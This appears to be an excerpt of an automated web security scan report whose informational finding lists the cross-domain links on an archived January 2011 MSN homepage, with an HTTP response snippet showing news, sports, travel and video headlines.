http://recruiting.scout.com/2/1043469.html
http://static.foxsports.com/content/fscom/img/2011/01/30/013011-Anything-Left-SW-PI_20110130092045409_303_117.JPG
http://www.bing.com/maps/explore/?org=aj&FORM=Z9LH9
http://www.bing.com/search?q=January+30&mkt=en-us&FORM=MSNHPT
http://www.bing.com/search?q=how+to+get+the+job+of+your+dreams&form=ap&gt1=36010
http://www.bing.com/search?q=how+to+live+on+a+tight+budget&form=ap&gt1=36010
http://www.bing.com/search?q=job+interview+makeup&form=ap&gt1=36010
http://www.bing.com/search?q=mom+cave+essentials&form=msnhed&GT1=36010
http://www.bing.com/travel/content/search?q=37+Secrets+of+the+Caribbean&cid=msntab1172106&Form=TRVCON
http://www.bing.com/travel/content/search?q=6+Great+Reasons+to+Visit+New+York+This+Year&cid=msn1177192&form=TRVCON&gt1=41000
http://www.bing.com/travel/content/search?q=Ask+Trip+Coach%3a+Top+Tips+for+Traveling+With+Your+Pet&cid=msn1177190&form=TRVCON&gt1=41000
http://www.bing.com/travel/content/search?q=Coolest+Small+Towns%3a+Ely%2c+Minn.+(population+3%2c470)&cid=msn1162079&FORM=TRVCON
http://www.bing.com/travel/content/search?q=Hawaiian+Islands%3a+Best+for+Gorgeous+Beaches&cid=msntab1162226&FORM=TRVCON
http://www.bing.com/travel/content/search?q=Hotels+With+a+Past%3a+Cadogan+Hotel%2c+London&cid=msn1176921&FORM=TRVCON&gt1=41000
http://www.bing.com/travel/content/search?q=New+in+Disney+Travel%3a+Alaska+Cruises&cid=msn1176778&FORM=TRVCON&GT1=41000
http://www.bing.com/travel/content/search?q=Underground+Attractions%3a+Cu+Chi+Tunnels%2c+Vietnam&cid=msntab1173638&FORM=TRVCON
http://www.bing.com/travel/content/search?q=World's+Coolest+Hot+Springs%3a+The+Blue+Lagoon%2c+Iceland&cid=msntab1174865&FORM=TRVCON
http://www.bing.com/travel/deals/airline-ticket-deals.do?cid=msn_tab&form=trvcon&gt1=41000
http://www.bing.com/travel/deals/cheap-flights-to-the-caribbean.do?cid=msn_tab&form=trvcon
http://www.bing.com/travel/deals/last-minute-flight-deals.do?cid=msn_tab&form=trvcon
http://www.bing.com/travel/destinations/honolulu-hawaii-hotels-hostels-motels-1002751?&qpvt=hawaii+hotels&cid=msn_tab&form=trvcon
http://www.bing.com/travel/hotels?cid=msn_tab&form=trvcon
http://www.bing.com/travel/hotels?cid=msn_tab&form=trvcon&gt1=41000
http://www.bing.com/videos/watch/video/anthony-hopkins-part-2/17we349d6?q=Anthony+Hopkins&rel=msn&from=en-us_msnhp&form=MSNRLL&gt1=42008
http://www.bing.com/videos/watch/video/baby-shows-his-war-face/20iqdwae?q=Baby+Cry&rel=msn&from=en-us_msnhp&form=MSNRLL>=42007
http://www.bing.com/videos/watch/video/baseball-bride/p67zd1w?q=Chad+Gaudin&rel=msn&from=en-us_msnhp&form=MSNRLL>=42007
http://www.bing.com/videos/watch/video/dana-carvey-part-3/17wmu6ei0?q=Dana+Carvey&rel=msn&from=en-us_msnhp&form=MSNRLL&gt1=42008
http://www.bing.com/videos/watch/video/emotional-race/17w5pcxcn?q=the+bachelor&rel=msn&from=en-us_msnhp&form=MSNRLL&gt1=42008
http://www.bing.com/videos/watch/video/rio-exclusive-films-first-two-minutes/5eq4owv?form=ETMONA&from=en-us_msnhp
http://www.theworkbuzz.com/employment-trends/video-interviews/?cobrand=msn&utm_source=MSN&utm_medium=MSNJM&utm_campaign=MSNCareers
http://www.theworkbuzz.com/fun-stuff/your-work-soundtrack/?cobrand=msn&utm_source=MSN&utm_medium=MSNJM&utm_campaign=MSNCareers
https://careers.microsoft.com/
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB

Request

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 19:48:43 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: CO1MPPRENA33
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Cteonnt-Length: 42932
Content-Length: 42932

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><body><d
...[SNIP]...
<div class="link"><a href="http://www.bing.com/search?q=January+30&mkt=en-us&FORM=MSNHPT">Sunday, January 30, 2011</a>
...[SNIP]...
<a href="http://www.msnbc.redacted/id/41334512/ns/world_news-mideastn_africa/?gt1=43001"><img src="http://col.stb.s-msn.com/i/39/C546EB3FB328CFCBC2B134AE608F13.jpg" title="Image: An Egyptian mother hugs her child as she watches some thousands of Egyptian protesters gather at Tahrir square in Cairo, Egypt. (.. Amr Nabil/AP)" width="303" height="211" alt="Image: An Egyptian mother hugs her child as she watches some thousands of Egyptian protesters gather at Tahrir square in Cairo, Egypt. (.. Amr Nabil/AP)" /></a>
...[SNIP]...
<div><a href="http://msn.foxsports.com/nfl/lists/Top-10-Super-Bowl-Best-Plays?GT1=39002"><img src="http://col.stb.s-msn.com/i/3E/3E32A65A54765E9193E7946B7F64.jpg" title="Image: File photo of Lynn Swann of the Pittsburgh Steelers as he catches a pass during Super Bowl X (.. AP)" width="303" height="211" alt="Image: File photo of Lynn Swann of the Pittsburgh Steelers as he catches a pass during Super Bowl X (.. AP)" /></a>
...[SNIP]...
<span><a href="http://msn.foxsports.com/nfl/lists/Top-10-Super-Bowl-Best-Plays?GT1=39002">The 10 Best Plays in Super Bowl History </a>
...[SNIP]...
<p>Remember Marcus Allen's touchdown run or Lynn Swann's catch? Check out the big game's <a href="http://msn.foxsports.com/nfl/lists/Top-10-Super-Bowl-Best-Plays?GT1=39002">best plays</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl?GT1=39028">Complete Super Bowl coverage </a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/fantasy/football/big-game-challenge">Take the Big Game Challenge & beat the experts </a>
...[SNIP]...
<li class="last"><a href="http://msn.foxsports.com/nfl/gameTrax?gameId=20110130032&GT1=39002">Pro Bowl stars collide today in Honolulu </a>
...[SNIP]...
<a href="http://glo.redacted/beauty/color-combo-6391.gallery?gt1=49036"><img src="http://col.stb.s-msn.com/i/DF/749E3611476657BDEDA1876151B3D.jpg" title="Image: (From left) Demi Moore & Rihanna (.. Gabriel Bouys/AFP/Getty Images; Mark Ralston/AFP/Getty Images)" width="303" height="211" alt="Image: (From left) Demi Moore & Rihanna (.. Gabriel Bouys/AFP/Getty Images; Mark Ralston/AFP/Getty Images)" /></a>
...[SNIP]...
<a href="http://money.msn.com/saving-money/compare-income-debt-savings.aspx?GT1=33021"><img src="http://col.stb.s-msn.com/i/51/E28E2C88338D867AE51A2853768E.jpg" title="Image: Woman looking over fence (.. Charles Gullung/Getty Images)" width="303" height="211" alt="Image: Woman looking over fence (.. Charles Gullung/Getty Images)" /></a>
...[SNIP]...
<a href="http://realestate.redacted/article.aspx?cp-documentid=26648468&GT1=35009"><img src="http://col.stb.s-msn.com/i/D8/6F79BE19ECC2D234C2E9F8B51365.jpg" title=" Image: Women playing pool & darts (.. Louis Turner/Getty Images; Caroline Schiff/Getty Images) " width="303" height="211" alt=" Image: Women playing pool & darts (.. Louis Turner/Getty Images; Caroline Schiff/Getty Images) " /></a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search?q=mom+cave+essentials&form=msnhed&GT1=36010">Bing: Essentials for your mom cave </a>
...[SNIP]...
<a href="http://www.msnbc.redacted/id/41337168/ns/world_news-mideastn_africa"><img class="portrait" src="http://col.stb.s-msn.com/i/A4/F0AD2AF1A47A5678C912AF71106548.jpg" title="" width="116" height="175" alt="Hosni Mubarak (.. Michael Reynolds / EPA file)
" /></a>
...[SNIP]...
<div><a href="http://www.bing.com/travel/content/search?q=New+in+Disney+Travel%3a+Alaska+Cruises&cid=msn1176778&FORM=TRVCON&GT1=41000"><img class="landscape" src="http://col.stb.s-msn.com/i/5B/EB40EDC3981E79258ECE32F53B8D76.jpg" title="Image: Woman crossing a bridge on the Wild Africa Trek, Disney's Animal Kingdom, Walt Disney World Resort, Fla. (.. Kent Phillips/Disney)" width="303" height="117" alt="Image: Woman crossing a bridge on the Wild Africa Trek, Disney's Animal Kingdom, Walt Disney World Resort, Fla. (.. Kent Phillips/Disney)" /></a></div><div><a href="http://www.bing.com/travel/content/search?q=New+in+Disney+Travel%3a+Alaska+Cruises&cid=msn1176778&FORM=TRVCON&GT1=41000">Disney's happiest places on Earth </a>
...[SNIP]...
<p>The vacation giant has global tours, cruises & famous parks. Which of these <a href="http://www.bing.com/travel/content/search?q=New+in+Disney+Travel%3a+Alaska+Cruises&cid=msn1176778&FORM=TRVCON&GT1=41000">13 adventures should you take</a>
...[SNIP]...
<div style="float:right;width:128px"><a href="http://www.bing.com/travel/content/search?q=Hotels+With+a+Past%3a+Cadogan+Hotel%2c+London&cid=msn1176921&FORM=TRVCON&gt1=41000"><img class="landscape" src="http://col.stb.s-msn.com/i/BA/C029CA31B84EE7CFCB17C349435C.jpg" title="Image: Cloister of Parador de Santiago de Compostela, Spain (.. Nik Wheeler/Corbis)" width="128" height="73" alt="Image: Cloister of Parador de Santiago de Compostela, Spain (.. Nik Wheeler/Corbis)" /></a></div><div style="margin-right:128px; padding-right: 10px"><a href="http://www.bing.com/travel/content/search?q=Hotels+With+a+Past%3a+Cadogan+Hotel%2c+London&cid=msn1176921&FORM=TRVCON&gt1=41000"><strong>
...[SNIP]...
<p>If hotels could talk, what stories they could tell. Check out these <a href="http://www.bing.com/travel/content/search?q=Hotels+With+a+Past%3a+Cadogan+Hotel%2c+London&cid=msn1176921&FORM=TRVCON&gt1=41000">12 hotels with a past</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/travel/content/search?q=6+Great+Reasons+to+Visit+New+York+This+Year&cid=msn1177192&form=TRVCON&gt1=41000">6 great reasons to visit New York this year </a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/travel/content/search?q=Ask+Trip+Coach%3a+Top+Tips+for+Traveling+With+Your+Pet&cid=msn1177190&form=TRVCON&gt1=41000">Tips for traveling with your pet </a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/travel/deals/airline-ticket-deals.do?cid=msn_tab&form=trvcon&gt1=41000">Leave winter behind: Find great flight deals </a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/travel/hotels?cid=msn_tab&form=trvcon&gt1=41000">Find a hotel for your next getaway </a>
...[SNIP]...
<a href="http://glo.redacted/living/superbowl-kids-bash-6426.gallery?gt1=49037"><img class="landscape" src="http://col.stb.s-msn.com/i/6E/A94D44FE6D02377F5C4F609DC03F.jpg" title="Image: Various treats for football party (Courtesy of shindigparties)" width="303" height="117" alt="Image: Various treats for football party (Courtesy of shindigparties)" /></a>
...[SNIP]...
<a href="http://glo.redacted/style/10-winter-style-essentials-6421.gallery?gt1=49006"><img class="landscape" src="http://col.stb.s-msn.com/i/F8/81185586C353EC6EA7CB7985B625C.jpg" title="Image: Bubble jacket & gloves (Courtesy of Ann Taylor; Kohl's)" width="128" height="73" alt="Image: Bubble jacket & gloves (Courtesy of Ann Taylor; Kohl's)" /></a>
...[SNIP]...
<a href="http://glo.redacted/relationships/caroline-rules-1534096.story?gt1=49006"><img class="landscape" src="http://col.stb.s-msn.com/i/80/EA261A55FB948339E67F47051B4F6.jpg" title="Image: Woman looking in mirror (.. Tim Scott/Getty Images)" width="128" height="73" alt="Image: Woman looking in mirror (.. Tim Scott/Getty Images)" /></a>
...[SNIP]...
<div><a href="http://msn.foxsports.com/golf/leaderboard"><img class="landscape" src="http://static.foxsports.com/content/fscom/img/2011/01/30/013011-Anything-Left-SW-PI_20110130092045409_303_117.JPG" width="303" height="117" alt="Image: Phil Mickelson (Stephen Dunn/Getty Images)" /></a></div><div><a href="http://msn.foxsports.com/golf/leaderboard">Live: Mickelson has victory in sight</a>
...[SNIP]...
<li class="ter"><a href="http://msn.foxsports.com/nfl/story/nfl-mock-draft-post-senior-bowl-012911">Who's going where? Here's latest NFL mock draft</a>
...[SNIP]...
<li class="ter"><a href="http://msn.foxsports.com/nascar/story/Patrick-Dempsey-24-Hours-of-Daytona-Juan-Pablo-Montoya-013011">McDreamy's run at Daytona ends with a blowup</a>
...[SNIP]...
<li class="ter"><a href="http://msn.foxsports.com/tennis/story/refocused-novak-djokovic-dominates-at-australian-open-013011">Does Aussie champ give men's tennis a Big 3?</a>
...[SNIP]...
<li class="ter"><a href="http://msn.foxsports.com/nfl/story/Porn-Super-Bowl-Green-Bay-Packers-012911">Packer has to choose: Super Bowl or 'Porn Sunday'</a>
...[SNIP]...
<li class="ter"><a href="http://msn.foxsports.com/nfl/story/Pro-Bowl-has-plenty-going-for-it-012711">Pro Bowl doesn't count, but has a lot going for it</a>
...[SNIP]...
<li class="ter"><a href="http://msn.foxsports.com/nba/story/Josh-Smith-Atlanta-Hawks-fine-for-obscene-gesture-013011">NBA player has to pay up after getting obscene</a>
...[SNIP]...
<li class="ter"><a href="http://recruiting.scout.com/2/1043469.html">Sanctions haven't slowed Southern Cal's recruiting</a>
...[SNIP]...
<a href="http://lifestyle.redacted/relationships/staticslideshowglamour.aspx?cp-documentid=27348235&gt1=32092"><img class="landscape" src="http://col.stb.s-msn.com/i/BE/4A28A4A19E915D6BB1CEF2DE2FCC.jpg" title="Image: Couple playing video game (.. Jose Luis Pelaez Inc/Getty Images) " width="303" height="117" alt="Image: Couple playing video game (.. Jose Luis Pelaez Inc/Getty Images) " /></a>
...[SNIP]...
<div style="float:right;width:128px"><a href="http://www.bing.com/videos/watch/video/baseball-bride/p67zd1w?q=Chad+Gaudin&rel=msn&from=en-us_msnhp&form=MSNRLL>=42007"><img class="landscape" src="http://col.stb.s-msn.com/i/69/3BC6B191E1FEB96B64CBE43BD6C79.jpg" title="Image: Video still of bride Syndal Gorden (.. TLC) " width="128" height="73" alt="Image: Video still of bride Syndal Gorden (.. TLC) " /></a></div><div style="margin-right:128px; padding-right: 10px"><a href="http://www.bing.com/videos/watch/video/baseball-bride/p67zd1w?q=Chad+Gaudin&rel=msn&from=en-us_msnhp&form=MSNRLL>=42007"><strong>
...[SNIP]...
<p><a href="http://www.bing.com/videos/watch/video/baseball-bride/p67zd1w?q=Chad+Gaudin&rel=msn&from=en-us_msnhp&form=MSNRLL>=42007">Dress-shopping</a>
...[SNIP]...
<li class="ter media"><a href="http://www.bing.com/videos/watch/video/emotional-race/17w5pcxcn?q=the+bachelor&rel=msn&from=en-us_msnhp&form=MSNRLL&gt1=42008">Video: Watch a sneak peek of Monday's 'Bachelor' </a>
...[SNIP]...
<li class="ter"><a href="http://msn.chemistry.com/cp/landing/57269?trackingid=516068&bannerid=2117936&gt1=26000">Take a quiz & get matched with someone like you</a>
...[SNIP]...
<div><a href="http://www.bing.com/videos/watch/video/dana-carvey-part-3/17wmu6ei0?q=Dana+Carvey&rel=msn&from=en-us_msnhp&form=MSNRLL&gt1=42008"><img class="landscape" src="http://col.stb.s-msn.com/i/A5/79D26D4C8D9DA16339279967F5473.jpg" title="Image: Video still of Dana Carvey (.. NBC)" width="303" height="117" alt="Image: Video still of Dana Carvey (.. NBC)" /></a></div><div><a href="http://www.bing.com/videos/watch/video/dana-carvey-part-3/17wmu6ei0?q=Dana+Carvey&rel=msn&from=en-us_msnhp&form=MSNRLL&gt1=42008">Carvey lobbied for Schwarzenegger</a>
...[SNIP]...
<p>Video: The comedian <a href="http://www.bing.com/videos/watch/video/dana-carvey-part-3/17wmu6ei0?q=Dana+Carvey&rel=msn&from=en-us_msnhp&form=MSNRLL&gt1=42008">recalls his campaigning days</a>
...[SNIP]...
<div style="float:right;width:128px"><a href="http://www.bing.com/videos/watch/video/anthony-hopkins-part-2/17we349d6?q=Anthony+Hopkins&rel=msn&from=en-us_msnhp&form=MSNRLL&gt1=42008"><img class="landscape" src="http://col.stb.s-msn.com/i/90/FB7888CDDECEAEF33752C48C04286.jpg" title="Image: Video still of Anthony Hopkins (.. ABC)" width="128" height="73" alt="Image: Video still of Anthony Hopkins (.. ABC)" /></a></div><div style="margin-right:128px; padding-right: 10px"><a href="http://www.bing.com/videos/watch/video/anthony-hopkins-part-2/17we349d6?q=Anthony+Hopkins&rel=msn&from=en-us_msnhp&form=MSNRLL&gt1=42008"><strong>
...[SNIP]...
<p>The actor tells Kimmel of his friendship with <a href="http://www.bing.com/videos/watch/video/anthony-hopkins-part-2/17we349d6?q=Anthony+Hopkins&rel=msn&from=en-us_msnhp&form=MSNRLL&gt1=42008">Randy Jackson.</a>
...[SNIP]...
<div style="float:right;width:128px"><a href="http://www.bing.com/videos/watch/video/baby-shows-his-war-face/20iqdwae?q=Baby+Cry&rel=msn&from=en-us_msnhp&form=MSNRLL>=42007"><img class="landscape" src="http://col.stb.s-msn.com/i/CD/70685892D9EC978E450FF891858.jpg" title="Image: Video still of baby screaming (.. StupidVideos)" width="128" height="73" alt="Image: Video still of baby screaming (.. StupidVideos)" /></a></div><div style="margin-right:128px; padding-right: 10px"><a href="http://www.bing.com/videos/watch/video/baby-shows-his-war-face/20iqdwae?q=Baby+Cry&rel=msn&from=en-us_msnhp&form=MSNRLL>=42007"><strong>
...[SNIP]...
<p>Video: <a href="http://www.bing.com/videos/watch/video/baby-shows-his-war-face/20iqdwae?q=Baby+Cry&rel=msn&from=en-us_msnhp&form=MSNRLL>=42007">Game on</a>
...[SNIP]...
<div style="float:left;width:128px"><a href="http://www.bing.com/videos/watch/video/rio-exclusive-films-first-two-minutes/5eq4owv?form=ETMONA&from=en-us_msnhp"><img class="landscape" src="http://col.stb.s-msn.com/i/FB/39B57119E113EAC72C86F212549.jpg" title="Image: 'Rio' (.. 20th Century Fox)" width="128" height="73" alt="Image: 'Rio' (.. 20th Century Fox)" /></a></div><div style="margin-left:128px; padding-left: 10px"><a href="http://www.bing.com/videos/watch/video/rio-exclusive-films-first-two-minutes/5eq4owv?form=ETMONA&from=en-us_msnhp"><strong>
...[SNIP]...
<div style="float:left;width:128px"><a href="http://www.theworkbuzz.com/employment-trends/video-interviews/?cobrand=msn&utm_source=MSN&utm_medium=MSNJM&utm_campaign=MSNCareers"><img class="landscape" src="http://col.stb.s-msn.com/i/A6/6401E4B948C6DA838C385E3FAD9FC.jpg" title="Image: Businesswoman on computer screen (.. Bernhard Lang/Getty Images)" width="128" height="73" alt="Image: Businesswoman on computer screen (.. Bernhard Lang/Getty Images)" /></a></div><div style="margin-left:128px; padding-left: 10px"><a href="http://www.theworkbuzz.com/employment-trends/video-interviews/?cobrand=msn&utm_source=MSN&utm_medium=MSNJM&utm_campaign=MSNCareers"><strong>
...[SNIP]...
<p>How <a href="http://www.theworkbuzz.com/employment-trends/video-interviews/?cobrand=msn&utm_source=MSN&utm_medium=MSNJM&utm_campaign=MSNCareers">video is replacing</a>
...[SNIP]...
<li class="ter"><a href="http://msn.careerbuilder.com/Article/MSN-1951-Job-Search-Get-Paid-to-Socially-Network/?SiteId=cbmsnjm41951&sc_extcmp=JS_1951_jobmod">Get paid to socially network</a>
...[SNIP]...
<li class="ter"><a href="http://www.theworkbuzz.com/fun-stuff/your-work-soundtrack/#more-6495/?cobrand=msn&utm_source=MSN&utm_medium=MSNJM&utm_campaign=MSNCareers">Your work soundtrack</a>
...[SNIP]...
<li class="ter"><a href="http://msn.careerbuilder.com/Article/MSN-1302-Workplace-Issues-Excuse-Free-Time-Off/?SiteId=cbmsnjm41302&sc_extcmp=JS_1302_jobmod">Excuse-free time off</a>
...[SNIP]...
<li class="ter"><a href="http://msn.careerbuilder.com/Article/MSN-1391-Workplace-Issues-Nine-Questions-You-Should-Ask-Your-Boss/?SiteId=cbmsnjm41391&sc_extcmp=JS_1391_jobmod">9 questions you should ask your boss</a>
...[SNIP]...
<li class="ter"><a href="http://msn.careerbuilder.com/Article/MSN-2469-Job-Search-Job-advice-that-was-true-20-years-ago-150-but-not-today/?SiteId=cbmsnjm42469&sc_extcmp=JS_2469_jobmod">Job advice that was true 20 years ago</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/search?q=job+interview+makeup&form=ap&gt1=36010">Bing: Got an interview? Get makeup tips</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/search?q=how+to+live+on+a+tight+budget&form=ap&gt1=36010">Search: How to live on a tight budget</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/search?q=how+to+get+the+job+of+your+dreams&form=ap&gt1=36010">Find: How to get your dream job</a>
...[SNIP]...
<div style="float:right;width:128px"><a href="http://www.bing.com/travel/content/search?q=Coolest+Small+Towns%3a+Ely%2c+Minn.+(population+3%2c470)&cid=msn1162079&FORM=TRVCON"><img class="landscape" src="http://col.stb.s-msn.com/i/A8/EAAC5AEEA4675FAFFCE4F81A2F97C.jpg" title="Image: Boats in harbor, Bandon, Ore. (Courtesy Wood Sabolt)" width="128" height="73" alt="Image: Boats in harbor, Bandon, Ore. (Courtesy Wood Sabolt)" /></a></div><div style="margin-right:128px; padding-right: 10px"><a href="http://www.bing.com/travel/content/search?q=Coolest+Small+Towns%3a+Ely%2c+Minn.+(population+3%2c470)&cid=msn1162079&FORM=TRVCON"><strong>
...[SNIP]...
<p>Bigger isn't always better in these <a href="http://www.bing.com/travel/content/search?q=Coolest+Small+Towns%3a+Ely%2c+Minn.+(population+3%2c470)&cid=msn1162079&FORM=TRVCON">fun, hip burgs</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/travel/content/search?q=Hawaiian+Islands%3a+Best+for+Gorgeous+Beaches&cid=msntab1162226&FORM=TRVCON">Which Hawaiian Island is right for you?</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/travel/content/search?q=World's+Coolest+Hot+Springs%3a+The+Blue+Lagoon%2c+Iceland&cid=msntab1174865&FORM=TRVCON">Coolest hot springs around the globe</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/travel/content/search?q=Underground+Attractions%3a+Cu+Chi+Tunnels%2c+Vietnam&cid=msntab1173638&FORM=TRVCON">15 unusual underground attractions</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/travel/content/search?q=37+Secrets+of+the+Caribbean&cid=msntab1172106&Form=TRVCON">37 steals & deals for the Caribbean</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/travel/deals/cheap-flights-to-the-caribbean.do?cid=msn_tab&form=trvcon">Cheap flights to the Caribbean</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/travel/destinations/honolulu-hawaii-hotels-hostels-motels-1002751?&qpvt=hawaii+hotels&cid=msn_tab&form=trvcon">Hotel deals in Honolulu</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/travel/deals/last-minute-flight-deals.do?cid=msn_tab&form=trvcon">Last-minute flights on the cheap</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/travel/hotels?cid=msn_tab&form=trvcon">Find the perfect hotel</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/maps/explore/?org=aj&FORM=Z9LH9#">Bing Maps: Where do you want to go next?</a>
...[SNIP]...
<a href="http://appetiteforlife.redacted/?section=episodes&content=2&source=msn&from=en-us_msnhp&GT1=25052"><img src="http://col.stb.s-msn.com/i/69/38A7E111C7E3A98263F6658E7063D2.jpg" title="Image: Video still of Andrew Zimmern (.. Reveille/Microsoft)" width="75" height="128" alt="Image: Video still of Andrew Zimmern (.. Reveille/Microsoft)" /></a>
...[SNIP]...
<a href="http://g.redacted/AIPRIV/en-us" class="adch"><img src="http://col.stc.s-msn.com/br/sc/i/icons/adchoices_gif.gif" alt="Ad Choice" title="Ad Choice" height="12" width="68" /></a>
...[SNIP]...
<li class="first"><a href="http://go.microsoft.com/fwlink/?LinkId=74170">MSN Privacy</a>
...[SNIP]...
<li><a href="http://advertising.microsoft.com/home/home">Advertise</a>
...[SNIP]...
<li><a href="https://careers.microsoft.com/">Jobs</a>
...[SNIP]...
<li><a class="opennew" href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a></li><li><a href="http://onlinehelp.microsoft.com/en-us/msn/thebasics.aspx">Help</a>
...[SNIP]...

22.433. http://www.redacted/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.redacted
Path:	/

Issue detail

The page was loaded from a URL containing a query string:

http://www.redacted/?euid=AD04D6F8B2FF44629973BD0674351135&userGroup=D1:default&PM=z:1

The response contains the following links to other domains:

http://advertising.microsoft.com/home/home
http://col.stb.s-redacted/i/1C/562F924B0BFF0EF9E7EB8EAB7627.jpg
http://col.stb.s-redacted/i/1F/B5E89286961128824C7AE6885EC.jpg
http://col.stb.s-redacted/i/25/0E3EF1611A1E83275679938D78B0.jpg
http://col.stb.s-redacted/i/2A/D52DA0C2C7D0F37DBB382A8318106A.jpg
http://col.stb.s-redacted/i/40/6087ED1789141E9E7E7476F7D2A816.jpg
http://col.stb.s-redacted/i/42/40224F9769E8AD5EA8F8A624E74A.jpg
http://col.stb.s-redacted/i/56/AE3B1E3A7AE6E076D8253197D1489B.jpg
http://col.stb.s-redacted/i/62/47BC124184233113131B97F8F8359E.jpg
http://col.stb.s-redacted/i/6A/5F94C974FCBAE14AFF1F886AE8B.jpg
http://col.stb.s-redacted/i/6D/94835E23C59DA9988832DB01F.jpg
http://col.stb.s-redacted/i/79/3D0CF24EE45332AEC818733145573.jpg
http://col.stb.s-redacted/i/80/2FF81810DDCE8AD3FEECAFC567B1FA.jpg
http://col.stb.s-redacted/i/8B/97F3ADB0E857BC24D9E8B13F3984.jpg
http://col.stb.s-redacted/i/97/46C217C8DB39C2D6289FA229C0D5BD.jpg
http://col.stb.s-redacted/i/9A/ADE8D0D0F6E1E0938CFDB1EA5D949E.jpg
http://col.stb.s-redacted/i/9F/2177C83925E3767FB9AC282991F22.jpg
http://col.stb.s-redacted/i/A4/C9F6DB1429C482320999B20976453.jpg
http://col.stb.s-redacted/i/A6/6401E4B948C6DA838C385E3FAD9FC.jpg
http://col.stb.s-redacted/i/A8/EAAC5AEEA4675FAFFCE4F81A2F97C.jpg
http://col.stb.s-redacted/i/B5/F9DAF1B9A4431DBA728B9CFFBAAF3.jpg
http://col.stb.s-redacted/i/B7/CA0287F24D531F31B28EDED6FF651.jpg
http://col.stb.s-redacted/i/C1/EC55D18C76E570E2D9F5B31996EFBC.jpg
http://col.stb.s-redacted/i/F9/5BC51AED48AF6FAE2ADD2AF77F074.jpg
http://col.stb.s-redacted/i/FB/39B57119E113EAC72C86F212549.jpg
http://col.stc.s-redacted/br/sc/i/icons/adchoices_gif.gif
http://go.microsoft.com/fwlink/?LinkId=74170
http://lifeinc.todayshow.com/_news/2011/01/28/5936478-good-graph-friday-what-cheat-on-taxes-never?gt1=43001
http://msn.careerbuilder.com/Article/MSN-1302-Workplace-Issues-Excuse-Free-Time-Off/?SiteId=cbmsnjm41302&sc_extcmp=JS_1302_jobmod
http://msn.careerbuilder.com/Article/MSN-1391-Workplace-Issues-Nine-Questions-You-Should-Ask-Your-Boss/?SiteId=cbmsnjm41391&sc_extcmp=JS_1391_jobmod
http://msn.careerbuilder.com/Article/MSN-1951-Job-Search-Get-Paid-to-Socially-Network/?SiteId=cbmsnjm41951&sc_extcmp=JS_1951_jobmod
http://msn.careerbuilder.com/Article/MSN-2469-Job-Search-Job-advice-that-was-true-20-years-ago-150-but-not-today/?SiteId=cbmsnjm42469&sc_extcmp=JS_2469_jobmod
http://msn.chemistry.com/cp/landing/57269?trackingid=516068&bannerid=2117936&gt1=26000
http://msn.foxsports.com/collegebasketball/scores
http://msn.foxsports.com/golf/story/Farmers-Insurance-Open-Phil-Mickelson-Tiger-Woods-Bill-Haas-012911
http://msn.foxsports.com/mlb/story/new-york-yankees-president-ted-levine-calls-out-texas-rangers-ceo-chuck-greenberg-012911
http://msn.foxsports.com/nba/gallery/new-york-knicks-atlanta-hawks-fight-marvin-williams-shawne-williams-gallery-012911
http://msn.foxsports.com/nba/story/Marvin-Willians-Shawne-Williams-suspension-Knicks-Hawks-012911
http://msn.foxsports.com/nba/story/OJ-Mayo-reason-for-suspension-energy-drink-012911
http://msn.foxsports.com/nba/story/shaq-oneal-kobe-bryant-los-angeles-lakers-boston-celtics-rivalry-intact-012911
http://msn.foxsports.com/nhl/story/FBI-helping-solve-the-mystery-of-the-Chicago-Blackhawks-missing-Stanley-Cup-winning-puck-012811/?GT1=39002
http://msn.foxsports.com/olympics/story/ian-thorpe-reportedly-mounting-comeback-for-2012-olympics-012911
http://onlinehelp.microsoft.com/en-us/msn/thebasics.aspx
http://recruiting.scout.com/a.z?s=73&p=9&c=4&pid=88&yr=2011
http://static.foxsports.com/content/fscom/img/2011/01/29/012911-CBK-Louisville-TWICE-AS-NICE-JW-PI_20110129151135131_303_117.JPG
http://www.bing.com/maps/explore/?org=aj&FORM=Z9LH9
http://www.bing.com/search?q=January+29&mkt=en-us&FORM=MSNHPT
http://www.bing.com/search?q=first+Beatles+degree&form=msnhed&GT1=36010
http://www.bing.com/search?q=how+to+get+the+job+of+your+dreams&form=ap&gt1=36010
http://www.bing.com/search?q=how+to+live+on+a+tight+budget&form=ap&gt1=36010
http://www.bing.com/search?q=how+to+make+your+own+laundry+detergent&form=msnhed&GT1=36010
http://www.bing.com/search?q=job+interview+makeup&form=ap&gt1=36010
http://www.bing.com/shopping/content/search?q=Cocktail+Dresses%3a+Silk+Organza+Strapless+Dress&form=MSHINA&publ=MSNHPSPOT&crea=TEXT_MSHINA_CORE_image_jl0125_1x1&gt1=36010
